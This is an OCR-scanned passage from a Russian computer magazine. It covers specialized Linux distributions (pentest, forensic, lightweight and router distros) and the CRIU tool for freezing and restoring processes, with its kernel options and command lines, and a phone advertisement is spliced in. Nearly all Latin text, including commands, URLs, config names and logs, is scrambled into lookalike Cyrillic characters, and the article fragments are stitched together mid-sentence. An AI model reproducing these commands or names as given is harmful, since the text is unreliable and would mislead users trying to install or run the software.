уникален и, несмотря на общую схожесть за- 
дач, предлагал разные инструменты и под- 
ход. Сегодня наиболее популярен ВаскТгаск 
( Ьаскігаск-Ііпих.огд ). построенный на базе 
ІІЬипІи (правда, пакетная база не полностью 



с ним совместима). Он используется пентесте- 
рами и хакерами для тестирования безопас- 
ности компьютеров и сетей, сбора информации, 
оценки уязвимостей, реверс-инжиниринга, 
нагрузочного тестирования, восстановления 
данных и так далее. Но есть и другие, не менее 
популярные. Например, относительно молодой 
проект ВаскВох (_іпих ( ЬаскЬох. ог ]), созданный 
студентами и преподавателями Калабрийского 
университета (Италия). Дистрибутив содер- 
жит коллекцию из более чем 70 инструментов 
для проведения оценки безопасности системы 
и выявления скрытых или потерянных данных 
в системе, анализа \Л/і-Рі, ѴоІР: Меіазріоіі/ 
Агтііаде, Мтар, ВеЕЕ, ОрепѴАЗ, ѴѴЗаІ, Беару 
и другие. ВаскВох Ыпих основан на ІІЬипІи 
и полностью с ним совместим, в качестве ра- 
бочего стола используется ХРСЕ. Разработчики 
предлагают свой репозиторий, позволяющий 
легко дооснастить нужным софтом любой 
ІІЬипІи-Ьазед дистрибутив: 

$ зидо адд-ар1:-геро5ІТ:огу рра:ЬаскЬох/^ 
■СЬгее 

Несколько другое назначение у йЕРТ Юідііаі 
Еѵідепсе & Рогепзіс Тооікіі, с: е : і і пих.пеі ). Он ис- 
пользуется для анализа последствий взломов 
компьютерных систем и сбора доказательств 
киберпреступлений, определения скомпроме- 
тированных данных и восстановления инфор- 
мации. Также содержит набор профильных 
приложений — антивирусы, сетевые сканеры, 
утилиты для выявления руткитов и просмотра 
информации в кеше браузера, просмотр реестра 
ѴѴіпдоѵѵз, взлом пароля ѴѴіпдоѵѵз (ОрЬсгаск), 
инструменты для поиска скрытых на диске 
данных, клонирования дисков и многое другое. 
Разработан на платформе І_иЬипІи, в качестве 
графических интерфейсов использованы 
(.ХйЕ и ОрепЬох. Может работать с РѴй и 1)5В- 
устройства (редакция Реп). Портативная версия 
предлагается в двух вариантах: для 2- (тіпітаі) 
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Отряды специального назначения 




САІЫЕ — используется для сбора доказательств киберпреступлений 



ВогіЬі Ыпих ориентирован на маломощные системы 



и 4-гигабайтных флешек. Аналогичное направ- 
ление имеет итальянский дистрибутив САІЫЕ 
(Сотриіег Аісіесі ІІЧѵеБІідаІіѵе Епѵігоптепі, 
сампе- ѵ е.пеі і он также построен на ІІЬипІи, 
в качестве рабочего стола используется МАТЕ 
(форк 6Ы0МЕ 2). В его состав входит полный 
набор утилит, необходимых для исследова- 
ния инцидента Когепвіс-анализ): бІкНавЬ, 

Аіг, ББсіеер, НОБепІіпеІ, Виік Ехігасіог, Ріѵѵаік, 
ВуІеІпѵеБІідаІог, Аиіотаіесі Ітаде & Везіоге 
(АІВ), Аиіорзу, Рогетозі, БІеиіНкіІ. Как осо- 
бенность можно отметить наличие утилиты 
ѴѴіпТауІог, предназначенной для досконального 
анализа Мпсіоѵѵб и создания подробных отчетов 
о зафиксированных аномалиях. Ряд проверок 
дисковых разделов и каталогов можно произ- 
вести при помощи дополнительных скриптов 
Маиіііиз, отсюда можно посмотреть список 
удаленных файлов, историю браузера, реестр 
ѴѴіпсіоѵѵб, изображения с метаданными ЕХІР. 



ДЛЯ МАЛОМОЩНЫХ СИСТЕМ 



Популярные дистрибутивы в большинстве 
своем рассчитаны на современные мощные 
ПК, и при попытке запустить их на старом 
железе можно впасть в тоску-печаль. В Сети 
найдется множество рекомендаций, как рас- 
шевелить систему, и они действительно дают 
некоторый эффект, правда, времени на такую 
оптимизацию уходит немало. Проще пойти 
другим путем — выбрать решение, специально 
собранное для подобных систем. В последнее 
время набирает популярность молодой дис- 
трибутив ВосіЫ 1_іпих ( ЬогіИі'іпих.сот І. В его 
основе лежит ІІЬипІи, в качестве рабочего сто- 
ла использован легкий ЕпІідЫептепІ. Рабочее 
окружение выглядит стильно и полностью 
перестраивается подзапросы пользователя. 
Так, во время загрузки пользователь выбира- 
ет один из семи профилей (простой, десктоп, 
композитный, легкий, ноутбук, планшетник 
и Рапсу — напоминает Мае) и тему. В первона- 
чальной поставке идет небольшой комплект 



приложений — легковесный браузер Мігіогі, 
1_ХТегтіпаІ, файловый менеджер ЕРМ, тексто- 
вый редактор Ьеа^расі и Бупарііс. Веб-сервис 
АррСепІег позволяет установить все нужные 
приложения прямо из браузера. В дистри- 
бутиве используется уникальный формат 
пакетов — файлы с расширением Ьоб, по сути 
представляющие собой что-то вроде само- 
распаковывающегося архива. Кстати, проект 
предлагает не только х86-сборку, но и вариан- 
ты для АРМ и 64-битных систем. 

В качестве альтернативы можно посмо- 
треть в сторону АЬзоІиІе Ыпих (аЬБОІиІе пих. 
огд і — это легкий дистрибутив, построенный 
на БІаскѵѵаге для рабочего стола предлагается 
РІихЬох либо ІсеѴѴМ. 

Еще одно интересное направление — не- 
большие портативные дистрибутивы, кото- 
рые могут использоваться для самых разных 
целей: для повседневной работы, работы 
на чужом ПК, безопасного серфинга, в нетбу- 
ках и смартфонах, в качестве спасательной 
ОС. Яркий представитель этого класса — 
Рирру Ыпих ( рцррѵі і пих.огд і. который работа- 
ет в том числе и без установки на хард с Сй/ 
ОѴО или 115В. Одна из его особенностей — 
сохранение результата работы и настроек 
в режиме ЫѵеСО. Разработчик в пределах од- 
ной версии выпускает несколько вариантов 
дистрибутива, ориентированных на разное 
оборудование, содержащих дополнитель- 
ное ПО и совместимых со 51аск\ѵаге (БІаско 
Рирру) или ІЛэипІи (Ргесізе Рирру). Несмотря 
на кажущуюся простоту, Рирру очень популя- 
рен (по рейтингу ОізІгоѵѵаІсЬ занимает 12-е 
место, обходя СепЮБ). Кроме того, доступно 
несколько клонов, разработчики которых 
реализовали свой вариант дистрибутива — 
русифицированный РирруЯиБ ( риррѵгиБ . 
огд ). АгсЬРир на базе АгсЬ Ыпих ( агсЬрир, 

5_І пеі), Масрир — вариант с рабочим столом 
ЕпІідМептепІ Е17 ( тасрир.огд ). для биоин- 
форматики ВіоРирру ( Ьіориррѵ.ога ) и другие. 



ДИСТРИБУТИВЫ-РОУТЕРЫ 



Среди всего многообразия І_іпих- 
дистрибутивов особо выделяются специ- 
ализированные дистрибутивы-роутеры, 
позволяющие с минимумом усилий подклю- 
чить сеть малого или среднего размера к ин- 
тернету. Практически все решения, кроме 
пакетного фильтра, имеют дополнительные 
возможности в виде кеширующего прокси- 
сервера, функции блокировки нежелатель- 
ного контента и протоколов, Ю5/ІР5 (БпогН, 
фильтра контента, антивирусной проверки 
НТТР/РТР/РОРЗ/БМТР-трафика, ѴРІМ, шей- 
пера трафика, антиспама, хотспота и многое 
другое. Политики позволяют настроить 
доступ к сайтам пользователю или группе 
на основе практически любых критериев. 

Все установки производятся при помощи 
веб-интерфейса (зачастую локализованного) 
и не требуют от пользователя каких-либо 
особых знаний *піх. Выбирать есть из чего, 
поэтому в первую очередь следует опреде- 
литься с требованиями. Например, Епсііап 
Соттипііу ( епсііап. сот ) является урезан- 
ной версией Епсііап Епіегргіве и рассчитан 
на небольшие сети, не требующие особых 
функций вроде ѴРМ или хотспота. Функцио- 
нал Ііпіапдіе баіеѵѵау ( ипіапс г е.согг. ) и 2еп1уаІ 
(гепіуа гд) определяет сам администра- 
тор, устанавливая необходимые модули. 

Хотя если ты новичок и раньше не работал 
с подобными решениями, следует обра- 
тить внимание на небольшие по размеру, 
но очень простые в настройках БтооіЬѵѵаІІ 
( БтооіЬѵѵаІІ.огд ) или ІРСор РігеѵѵаІІ Ы.пеі/ 
ргоіесІБ/ірсор ). 



ЗАКЛЮЧЕНИЕ 



Как видишь, чтобы решить определенную 
задачу, необязательно выбирать дистрибутив 
«для всех», специализированные решения 
проще развернуть, они оптимизированы и ос- 
нащены всем необходимым, зо 
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инженеоия 



СИСТЕМУ 

ЗАМОРОЗКИ 

процессов стц 



Любому из нас приходится время от времени 
запускать тяжеловесные процессы, которые 
могут выполняться по несколько часов кряду. 
Это может быть компилирование больших 
проектов, обработка видео или фотографий. 

К сожалению, не всегда получается возобновить 
процесс, однажды прервав его, и бывает, 
что все приходится начинать сначала. Но что, 
если можно было бы заморозить приложение 
в любой точке, сохранить состояние на диск 
и возобновить исполнение в любой момент 
(возможно, даже на другом компе)? 



Возможность заморозки и возобновления работы процессов — 
весьма заманчивая идея. На десктопе с ее помощью можно реа- 
лизовать быструю загрузку операционной системы, когда вместо 
полноценного запуска все необходимые демоны и сервисы просто 
будут восстановлены с диска. Или, например, сохранить процесс 
на флешку, а затем восстановить его на другой машине и продол- 
жать пользоваться приложением как ни в чем не бывало. Ну или, 
скажем, приостановить процесс обработки видео на время срочных 
работ с компом. На серверах функция заморозки может быть еще 
полезней. С ее помощью можно организовать процесс прозрачной 
миграции виртуальных машин, процесс балансировки нагрузки, 
или быстрого обновления, или ремонтных работ, при котором про- 
стои будут минимальны. 

В разное время такую функциональность пытались реализовать 
многие программисты. Наиболее заметным стал проект СгуоРЮ 
( 1 оег ) с одноименной утилитой, работающей в про- 
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Список коммитов СРШ в ядро 

странстве пользователя и позволяющей быстро сохранить образ 
процесса на диск, а затем восстановить его. К сожалению, СгуоРЮ 
была эффективна только для простых консольных программ 
и часто давала сбои при попытке заморозить более комплексное 
приложение, работавшее с сетью или обладающее графическим 
интерфейсом. Также у нее было много других ограничений из-за 
того, что утилита не могла получить от ядра более детальные 
сведения о процессе, а затем правильно восстановить нужные 
структуры данных в нем же. 

Многие другие схожие проекты также потерпели фиаско по тем 
же причинам, поэтому на долгое время об идее вроде бы забыли. 
Нужный функционал требовал содействия ядра, а соответствую- 
щие патчи никто не принимал, как ломающие внутренние структу- 
ры. Были и попытки создать реализацию чекпоинтинга с помощью 
сторонних библиотек, подменяющих системные вызовы и по- 
зволяющих более точно отслеживать состояние процесса (проект 
БМТСР, например), но, как и предшественники, они тоже страдали 
от проблемы недостатка содействия ядра в этом процессе и не мог- 
ли реализовать идею заморозки полностью. 

Тем не менее разработчикам из небезызвестной компании 
РагаІІеІз не так давно удалось добавить соответствующие функции 
в официальное ядро, и теперь мы имеем почти полноценный ин- 
струмент для заморозки процессов. Называется он СРШ ( сгіи.огд/ 
Мат Раде ) и разрабатывается в составе системы виртуализации 
уровня ОС ОрепѴІ. 



СРЮ 



История СРШ (СЬескроіпІ/РезІоге Іп Узегзрасе] началась в далеком 
2005 году, когда компания РагаІІеІз взялась реализовать функцию 
заморозки/разморозки процессов на уровне ядра для проекта 
0репѴ2. Через несколько лет к работе подключились и другие 
компании, в результате чего было представлено более ста патчей 
для ядра, полностью реализующих нужную функциональность. Од- 
нако, чего и следовало ожидать, мантейнеры ядра отвергли патчи, 
как слишком комплексные, и РагаІІеІз не осталось другого выбора, 
как начать реализацию системы на уровне пользователя с неболь- 
шими изменениями в ядре в качестве вспомогательных функций. 

В результате в 2011 году главный разработчик 0репѴ2 Павел 
Емельянов представил первую реализацию СРШ и соответствую- 
щий патчсет. На этот раз функциональность была почти полностью 
реализована на уровне пользователя, а в ядре содержался лишь 
минимальный набор функций, необходимых для получения более 
детальной информации о процессах, никак не ломающих внутрен- 
нюю согласованность структур ядра. Сообщество благосклонно 
приняло эту идею, и в январе 2012 года Линус Торвальдс интегри- 
ровал их в официальную ветку ядра, не забыв, правда, добавить 
ехидный комментарий Эндрю Мортона о сумасшедших русских и их 
сумасшедших идеях (см. врезку). 

Далее последовали и другие патчи, и к данному моменту в ядре 
уже появилось девять новых функций, так или иначе относящихся 
к заморозке процессов. Почти все из них реализованы с помощью 
экспорта необходимой информации через новые файлы каталога 



СГІООІ8 Оц*р -I рю 1<ОРІІОП5>] 

сгіооіа геаіоге -1 рій [<орІіопз>] 
сгіооів зЬом (-0 01ПИ-Г ГПе» (<ориопз>) 
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Список опций сгіооів 

/ргос/РЮ/, которые при запуске читает утилита сгіооіз. Среди до- 
бавленной функциональности можно отметить следующее: 

• Каталог/ргос/РЮ/тар_)іІез/. Содержит ссылки на все файлы, 
отображаемые приложением в виртуальную память, имя кото- 
рых представляет собой адрес расположения файла в памяти. 

Для получения такой информации уже существовал файл /ргос/ 
РЮ/тарз, однако новый каталоготкрываетбольшую гибкость, 

а также гарантирует, что замороженный процесс при восстанов- 
лении отобразите памятьте же файлы, что и до заморозки. 

• Файл/ргос/РЮАазк/ТЮ/сЬіІсІгеп, который содержитсписок всех 
потомков процесса. Эта информация необходима для заморозки 
дерева процесса либо всех потоков одного приложения. 

• Файл /ргос/РЮ/зІа* теперь включает информацию об аргументах 
приложения, список переменных окружения и код возврата. 

• Системный вызов ргсШ) был расширен итеперь можетбыть 
использован для восстановления аргументов приложения 

и переменных окружения после разморозки. Это и предыдущее 
новшество позволяют полностью восстановить информацию 
о процессе так, что утилиты типа рз не покажут разницы. 

• Новый системный вызов кстрП, который позволяетсравнитьдва 
процесса/потока и выявить разделяемые ими ресурсы. 

• Для получения информации, доступнойтолькосамомупро- 
цессу посредством системных вызовов, таких как деіііітегі) 
и зідасІіопП, задействована функция внедрения так называе- 
мого паразитного кода, разработанная Те]ип Нео. Эта функция 
позволяет поместить в адресное пространство процесса участок 
кода, что используется СРШ для сбора недостающей информации 
с помощью системных вызовов. 

• Добавлена новая зузсіі-переменная кегпеі. пз_ІазІ_рісІ, которая 
позволяетявноуказать, какой РЮ получит потомок процесса по- 
сле следующего вызова сІопеО. Она нужна для того, чтобы после 
разморозки процесс получил свой прежний РЮ (изменившийся 
РЮ можетвызватьочевидные проблемы, вроде различия РЮ, 
прописанного в файле/ѵаг/гип/ЬМрсІ.рісі и реального). 

Это только часть механизмов, добавленных в ядро для под- 
держки СРШ, но уже только они одни позволяют производить 



ИСТОРИЯ СКШ НАЧАЛАСЬ 
В 2005 ГОДУ, КОГДА РАКАЬЬЕІБ 
ВЗЯЛАСЬ ЗА ФУНКЦИЮ 
ЗАМОРОЗКИ/РАЗМОРОЗКИ 
ПРОЦЕССОВ НА УРОВНЕ ЯДРА 
ДЛЯ ПРОЕКТА ОРЕЫѴ2 
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заморозку и восстановление многих приложений. Происходит этот 
процесс примерно так. При запуске процедуры заморозки сгіооіз 
останавливает процесс с помощью системного вызова рІгасеП 
(РТВАСЕ_5ЕІ2Е), затем собирает информацию обо всех открытых 
им файлах, сокетах, потомках и прочем с помощью чтения файлов 
каталога /ргос/РЮ/, системного вызова ргсіН) и вставки паразит- 
ного кода. Затем происходит сохранение образа памяти процесса, 
а также значений всех его регистров [опять же с помощью рігасе) 
и, наконец, остановка процесса. 

После того как будет инициирован процесс разморозки, утилита 
сгіооіз восстанавливает память процесса, устанавливает нужное 
значение РЮ в кегпеІ.П5_ІазІ_ріс), форкается, открывает все не- 
обходимые ресурсы и запускает исполнение с помощью систем- 
ного вызова зідгеІигпО, возвращающего управление процессу 
именно в ту точку, в которой он был до заморозки. Таким образом 
удается заморозить и восстановить не только один процесс/поток, 
но и всех его потомков. 

Более того, СРШ, как система, разрабатываемая в расчете 
на применение в системах виртуализации, позволяет не только 
полностью восстановить процесс, но и даже не потерять при этом 
сетевые соединения. Для этого в ядре была реализована система 
ТСР гераіг тобе, которая позволяет в прямом смысле разобрать 
и заново собрать сокет, никак при этом не взаимодействуя с дру- 
гой стороной соединения. Эта функциональность, в частности, 
позволяет заморозить, например, АрасЬе, затем перенести его 
образ на другую машину, разморозить, и он продолжит работать 
как ни в чем не бывало, не потеряв соединение даже с уже подклю- 
ченными клиентами (если, конечно, клиент не успеет сам разо- 
рвать соединение из-за истечения времени ожидания). 

Кроме этого, СРШ также поддерживает приложения, использу- 
ющие такие функции, как іпоіііу и ероІІ, а также другую функцио- 
нальность ядра, однако эти пачти еще не включены в официальную 
ветку. 



ЯДРО И УТИЛИТА 



Как я сказал выше, все нужное для работы СРШ уже есть в ва- 
нильном ядре версии 3.7. Однако многие дистрибутивостроители 
используют ядра с выключенной функцией чекпоинтинга, а это 
значит, что ядро придется пересобирать самостоятельно с нуж- 
ными опциями. Как это делать, было описано уже миллиарды раз, 
поэтому ограничусь лишь списком опций, которые должны быть 
включены при сборке: 

Опции ядра , необходимые СРШ 

Сепегаі зеТир -> СЬескроіпТ/ге5Тоге зиррогС 
(С0МРІС_СНЕСКР0ІМТ_КЕ5Т0КЕ) 

Сепегаі зеТир -> ореп Ьу -РІіапсІІе зузсаііз 
(СО^ІС_РНАМІ_Е) 

Сепегаі зеТир -> ЕпаЫе еѵепТТсІО зузТет саіі ^ 
(ОЖРіе_ЕѴЕМТРО) 

Сепегаі зеТир -> ЕпаЫе еѵепТроІІ зиррогТ (СШРІС_ЕРОи_) 



иіявІосаІЬо*! “1$ сгіооіз -ѵ 4 Ахир -1 1236 
(00 008042) Іяаде йіг М іа 1021 
( 00 . 063510 ) =еаа*****«*х»в*еам**8гв*з*а8вэт»Г5 
(00.063519) (клярілд ргосеааеа (ріО: 1236) 

(08.063528) 

(00.063535) І.оск пеіыогк 

(00.063541) игіііпд ітаде іпѵепіогу (ѵегаіоп 1) 

(00.097933) Соііесііпд Івзкз зіагііпд ігое 1236 
(00 .098179) 5еіге0 Івзк 1236. зіаіе 1 
(00.098359 ) бвігіпд 1236’з 1239 ІПгеаО 

(00.098514) 5еігіпд 12Э6'з 1240 іПгеаС 

(00.098671) 5е1гіпд 1236' а 13568 ІІігевО 

(00.098810) беігіпд 1236 5 13569 ІЬгеаО 

(00.099226) СоІІесІеО 1236 іп 1 зіаіе 
(00.099719) Еггог (вк-ипіх.с 268): N 0 зоскеі зічііОомп іпіо 
(00.099760) Соі 

у!ег».,11т:0 0 
(08.099789) Соі 

0ПІГ0І 

(08.099800) Соі 

0/,)оцгпа1/зІ<1оиІ 
(00 .099826) Соі 

0/.|шгпа1 /воске! 

(00 099846) Соі 



іпо 0х503е01 реег.іпо 8 іаиііу 


1 Іуре 


1 зіаіе 10 папе /Іар/.ІІІ 


іпо 0x1602 реег.іпо В іатііу 


1 Іуре 


5 зіаіе 10 паяе /гцп/ийеѵ/с 


іпо 0x1604 реег.іпо 0 іаяіііу 


1 Іуре 


1 аіаіе 10 пая* /гцп/зузіе« 


іпо 0x1607 реег.іпо 0 Іааііу 


1 Іуре 


2 зіаіе 7 пая» /гип/зузіея» 


іпо Ѳх25а1 реег.іпо 0 Гмііу 


1 Іуре 


1 зіаіе 10 пая* /)*■*/,)№. 



Процесс сохранения состояния процесса 



Рііе зузТетз -> ІпоТі-Ру зиррогТ -Рог изегзрасе ^ 

(^ріе_імотіРѵ_и5ЕЯ) 

ЕхесиТаЫе Рііе -РогтаР:5 -> ЕтиІаТіопз -> ІА32 ЕтиІаТіоп 
(СОНРІС_ІА32_ЕМІИАТІОМ) 

№1:могкіп§ 5иррогС -> №1:могкіп§ орііопз -> ♦-» 

ІШх сіотаіп зоскеТз -> ІІРЛХ: зоскеТ топі1:огіп§ -* 
іпТегТасе (С0МРІС_ІШХ_0ІА6) 

№1:могкіп§ зиррогТ -> Ме1могкіп§ орТіопз -> «-• 

ТСР/ІР пеР:ѵ)Югкіп§ -> ІИЕТ : зоскеі: топі1:огіп§ іпТегТасе -« 

(ажріе_:шЕТ_оіАС) 

МеТмогкіпб зиррогТ -> №1:могкіп§ орТіопз -> РаскеТ ^ 
зоскеі: -> Раскеі:: зоскеТз топіТогіп§ іпТег-Расе 
(СОЫРІО_РАСКЕТ_ОІАО) 

Собственно, почти все эти опции являются стандартными, 
и обычно выключенной оказывается только первая из них (стано- 
вится доступна после включения опции СопРідиге зіапсіагсі кегпеі 
РеаРигез (ехрегі изегзі). Чтобы проверить, так ли это, можно вос- 
пользоваться следующей командой: 

$ гсаТ /ргос/сопб §.§2 | §гер С0МРІС_СНЕСКР0ІМТ_КЕ5Т0КЕ 
С(МРІС_СНЕСКР0ІМТ_РЕ5Т0РЕ із по* зеТ 

В данном случае по выводу команды можно заметить, что опция 
не включена, поэтому ядро придется пересобирать. Сразу скажу, 
что в данный момент СРШ работает только на системах х86_64, 
поэтому если ты юзаешь і386-сборку дистрибутива, то ничего 
не получится. 

Теперь, когда есть ядро с поддержкой СРШ, нам понадобится 
утилита сгіооіз, которая как раз и занимается заморозкой/размо- 
розкой процессов. В дистрибутивах ее тоже нет, поэтому придется 
опять же собрать из исходников (вместе с пакетом ргоіобиі-с, 
позволяющим работать с форматом боодіе'з Ргоіосоі Виііегз, в ко- 
тором сгіооіз сохраняет состояние сетевых соединений): 



КОММЕНТАРИЙ ЭНДРЮ МОРТОНА 



Это проект, разрабатываемый разными сумасшедшими русскими, по созданию/восстановлению 
контрольных точек в основном из пользовательского приложения, с различным странным 
вспомогательным кодом, добавленным в ядро там, где это необходимо. 

Однако я не так, как разработчики, уверен в том, что все это когда-нибудь заработает! Поэтому 
я прошу их «обернуть» макросом С0ЫРІ6_СНЕСКР0ІЫТ_РЕ5Т0РЕ каждый кусок нового кода 
в ядре. Так что если со временем все это закончится слезами и проект в целом развалится, мы 
сможем пройтись по коду и выкинуть все без следа. 
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Криогенная инженерия 



[ ^т@1оса1Ьозі ±тр ]$ 1з сМескроіпі/ 



соге-5303 . ітд 
соге-5363. ітд 
сгесІ5-5303 . ітд 
сгесІз-БЗбЗ , ітд 
еѵепІ-Гс! . ітд 
еѵепіроі 1 . ітд 
еѵепіроі І-іТсі . ітд 
ТсІ іпТо-5303 , ітд 



[ ^пШосаШоз* ітр]$ 



ТсІігѵГо-БЗбЗ . ітд 
ТіТо-сІаіа. ітд 
Т і То . ітд 
Тз-5303 . ітд 
Тз-5363 . ітд 
іпеізк . ітд 
іпоііТу . ітд 
іпоіі^у-шсі , ітд 



іпѵепіогу . ітд 
ііітегз-5303. ітд 
ііітегз-5363, ітд 
тт-5303 . ітд 
тт-5363 . ітд 
раскеізк . ітд 
радез-5303 . ітд 
радез-5363 . ітд 



рірез-гіаіа . ітд 
рірез . ітд 
гед-ТіІез, ітд 
гетар--ГраіИ. ітд 
зідасіз-5303 . ітд 
зідасіз-БЗбЗ . ітд 
зідпаІТсІ. ітд 
зк-диеиез. ітд 



і іу . ітд 
Пу-іпГо. ітд 
ипіхзк . ітд 
ѵтаз-5303 . ітд 
ѵтаз-5363 . ітд 



Содержимое каталога состояния процесса 

$ ссі /*тр 

$ м§е1: ИИр://ЬіІ. 1у/КССеЕд 
$ Іаг -Х 2 -Р рго1:оЬи-Р-с-0. ІБ.Іаг.ег 
$ ссі рго^оЬи-Р-с-Ѳ. 15 
$ ./сопб§иге --ргебх=/и5г && таке 
$ зисіо таке іпзіаіі 
$ ссі /Ттр 

$ мёе* Мі-Іір : //Ьіі: . Іу/Іл/^ОИс 
$ 1;аг -хд-Е сИ:ооІ5-Ѳ.3.1:аг.Ь22 
$ ССІ СГІ:ООІ5-0.3 
$ таке 

$ ср сгСооІ5 ~/Ып 
$ ехрогТ РАТН=~/Ьіп : $РАТН 

Для корректной работы сгіооіз также необходим пакет іргои1е2 
версии не ниже 2.6.0. Ты можешь без проблем установить его 
стандартными средствами дистрибутива. После установки можно 
проверить работоспособность сгіооіз, запустив команду зисіо 
сгСооіз сЬеск. 

Если сообщений об ошибке на экран выведено не будет, значит, 
все ОК. 



КРИОКАМЕРА 



Как же теперь заморозить процесс? Очень просто, будет достаточ- 
но следующей команды: 



$ зисіо сгСооІз -О каталог сіитр -Т РЮ-процесса 

Каталог следует создать заранее, после выполнения команды 
он заполнится файлами с расширением ітд, в которых будет сохра- 
нена вся информация о процессе. Для восстановления достаточно 
выполнить обратную команду: 

$ зисіо сгСооІз -О каталог гез1:оге -1 РЮ-процесса 

Процесс вновь появится в системе, причем, если это консольное 
приложение, оно будет запущено в том же окне терминала. Раз- 
работчики говорят, что таким образом можно замораживать таке 
и 6СС, Іаг, Ьі2, зепсітаіі, АрасНе, Му5СІІ_, 55Н, сгопб, ѴІМС-сервер, 
пдіпх и многие другие приложения. Я смог без всяких проблем вы- 
полнить заморозку тс, тоср, Ѵіт, однако в случае с графическими 
приложениями положиться на софт получится не всегда, например, 
боодіе СЬготе мне восстановить так и не удалось. 

Стоит заметить, что сгіооіз сохраняет все дерево процессов, вос- 
принимая переданный ему РЮ как родительский. Эту особенность 
можно использовать не только для многонитевых приложений, но и, 
например, для сохранения контейнеров І_ХС и 0репѴ2. Разработчи- 
ки рекомендуют использовать для этого следующую команду: 

$ зисіо сгСооіз сіитр --'Сср-ез'СаЫізІзесІ -п пе* -п тп* ^ 

-п ірс -п рісі --асЬіоп-зсгірІ: "пеі-зсгір* . зИ" -Э сіитр/ 

-о сіитр. 1о§ -* іпі*-РЮ 



1.6 орЬпшз С 



СОВЕТ № 3: ДЕЛАЕМ ЖИЗНЬ ПРЕКРАСНЕЕ 




Первое, что бросается в глаза при работе 
с Ю Оріітиз 6, — прекрасный минима- 
листичный дизайн. Его отличительные 
черты — простота, металлические встав- 
ки, необычная задняя панель. Но куда 
важнее то, что внутри. 

В четвертой серии Апсігоісі у плат- 
формы появился удачный и узнаваемый 
дизайн приложений Ноіо, и интерфейс 
Оріітиз 6 хорошо сочетается с новым 
оформлением. Кроме того, разработчики 
внедрили несколько действительно прак- 
тичных решений. С помощью функции 
СІБІісіе на экране (благо его диагональ со- 
ставляет 4,7 дюйма) можно работать сразу 
с двумя приложениями, что понравится 
мультизадачным пользователям. 



Красивая платформа не может 
обойтись без хороших мультимедий- 
ных характеристик. В распоряжении 
пользователя яркий Тгие Нй 1Р5 Ріиз 
экран с разрешением 1280 на 768 точек 
и камера с матрицей на 13 мегапикселей. 
Представляет интерес и функция Тіте 
Саісб БЬоІ — чтобы гарантированно 
сделать удачный кадр, камера делает не- 
сколько снимков еще до нажатия кнопки 
спуска — пользователю остается только 
выбрать идеальный вариант. 

Помимо всего прочего, в Оріітиз 6 
предусмотрены настройки для съем- 
ки в условиях плохой освещенности и 
различные варианты активации спуска, 
включая голосовой. 






ІЖІХОШ 



— Бепегаі зеіир 



.сопТіа - Ьіпих/хѲБ 64 3.6.11-1 Кегпеі Сопііаигаііоп 



Тітегз зиЬзузіет — > 

ВШ ЗиЬзузіет — > 

<*> Кегпеі .сопіід зиррогі 

[*] ЕпаЫе ассезз іо .сопіід іЬгоидЬ /ргос/сопіід . дг 
(19) Кегпеі Іод ЬиіГег зіге (16 => 64КВ, 17 => 128КВ) 
СопігоІ бгоир зиррогі — > 



[ ] СЬескроіпі/гезіоге зиррогі (ИЕН) 



[*] Иатезрасез зиррогі — > 

[*] Яиіотаііс ргосезз дгоир зсЬесІиІіпд 

[ ] ЕпаЫе ЬергесаіесІ зузіз іеаіигез іо зиррогі оІЬ изегзрасе іооіз 
Кегпе1->изег зрасе геіау зиррогі (іогтегіу геіауіз) 

[*] Іпіііаі В8И іііезузіет апЬ ВПМ сіізк ( іпіігатіз/іпіігсі) зиррогі 
О Іпіігатіз зоигсе іііе(з) 

[*] Зиррогі іпіііаі гатЫзкз сотргеззесі изіпд дгір (ИЕН) 

С ] Зиррогі іпіііаі гатЫзкз сотргеззесі изіпд Ьгір2 ( НЕЙ) 

С 3 Зиррогі іпіііаі гатЫзкз сотргеззесі изіпд І_2МП ( ИЕН) 

[ ] Зиррогі іпіііаі гатЫзкз сотргеззесі изіпд Х2 (ИЕИ) 

[ 1 Зиррогі іпіііаі гатЫзкз сотргеззесі изіпд 1_20 (ИЕИ) 



гіЕЭЕ Р2 



Зут Іпіо 



Та самая опция 



В данном случае аргумент --Іср-езІаЫізЬесі заставляет сгіооіб 
сохранить также и состояния сетевых соединений, чтобы их можно 
было восстановить после разморозки. Опции -п пеі -п тпі -п ірс -п 
ріб позволяют корректно сохранить информацию о пространствах 
имен сети, точках монтирования, ІРС и процессов. Здесь они не- 
обходимы, так как контейнеры выполняются в изолированных про- 
странствах имен, и без них процессы удастся восстановить только 
в корневую систему. С помощью опции --асііоп-зсгірі "пеІ-зсгірІ.зЬ" 
мы указываем команде исполнить скрипт пеІ-зсгірІ.зЬ перед за- 
морозкой. Он заблокирует любые сетевые коммуникации на время 
заморозки. Этот скрипт ты найдешь на прилагаемом к журналу 
диске. Опция -о сіитр.Іод сохраняет лог заморозки в файл битр. 

Іод. В конце мы указываем РЮ процесса іпіі внутри виртуального 
окружения. 

Для разморозки контейнера используется схожая команда: 

$ зисіо сгіооіб гезТоге 

--Тср-езТаЫізЬесІ -п пеТ -п тпТ -п ірс -п рісі «-< 
--асііоп-зсгірі: "пеТ-зсгірі.зИ" --ѵеТИ-раіг еТІі0=интерфейс ^ 
--гооТ каталог-контейнера Ю сІаТа/ ♦-< 

-о гезТоге. 1о§ -1 іпіІ-РЮ 

В этот раз задействованы две дополнительные опции. Это 
«--ѵеіЬ-раіг еіЬО=интерфейс», в которой следует указать имя 
виртуального ѵеіЬ-интерфейса на стороне хост-системы, а также 
«--гооі каталог-контейнера» для указания корневого каталога кон- 
тейнера. Таким образом можно без каких-либо проблем сохранить 
контейнер на одной машине, затем перекинуть его дамп на другую 
и восстановить его на ней. 

Еще одно неожиданное применение сгіооіз — это возможность 
внедрять паразитный код в работающие приложения, заставляя их 
исполнять указанные нами системные вызовы. Среди применений 
этой технологии разработчики приводят в пример возможность 
переопределить стандартный поток ввода-вывода: 



$ зисіо сгТооіз ехес -Т РЮ сіозе 1 
$ зисіо сгТооіз ехес -1 РЮ ореп '&путь-до-файла' 2 

Впрочем, ту же операцию можно проделать и с помощью от- 
ладчика 60 В. 



ПРОДАКШН? 



Несмотря на молодость и очевидную недоработанность проекта, 
СРЮ уже используется в последней версии облачной платформы 
РагаІІеІз СІоисІ Вегѵег. Кроме самого СРЮ, в ней также задей- 
ствованы такие технологии, как кехес и ргагтгіз. Используемые 
совместно, они способны на порядок сократить время простоя 
сервера при обновлении в сравнении с классической холодной 
перезагрузкой. 

Работает это примерно так. Сначала состояние виртуальных 
серверов сохраняется с помощью СРЮ в виртуальную ФС ргатіз 
(представляет собой аналог Ітр^з, главная особенность — ее 
